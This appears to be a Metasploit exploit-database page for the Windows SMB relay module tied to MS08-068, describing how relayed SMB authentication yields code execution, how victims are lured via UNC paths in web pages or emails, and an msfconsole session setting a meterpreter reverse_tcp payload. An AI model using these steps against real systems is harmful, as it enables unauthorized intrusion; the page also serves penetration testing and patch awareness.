Microsoft Windows SMB Relay Code Execution | Metasploit Exploit Database (DB)

Microsoft Windows SMB Relay Code Execution

This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration. It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the "reflection" attack has been effectively broken.

Search Other Modules


Exploit Rank

  • Excellent

Exploit Authors

  • hdm < hdm [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Automatic (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show payloads
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set LHOST [MY IP ADDRESS]
msf exploit(smb_relay) > exploit


Exploit Module Options

SMBHOST The target SMB server (leave empty for originating system)
SRVHOST The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0)
SRVPORT The local port to listen on. (default: 445)
SSL Negotiate SSL for incoming connections
SSLCert Path to a custom SSL certificate (default is randomly generated)
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EXE::Custom Use custom exe instead of automatically generating a payload exe
EXE::FallBack Use the default template in case the specified one is missing
EXE::Inject Set to preserve the original EXE function
EXE::OldMethod Set to use the substitution EXE generation method.
EXE::Path The directory in which to look for the executable template
EXE::Template The executable template file name.
EnableContextEncoding Use transient context when encoding payloads
ListenerComm The specific communication channel to use for this service
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
TCP::max_send_size Maximum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)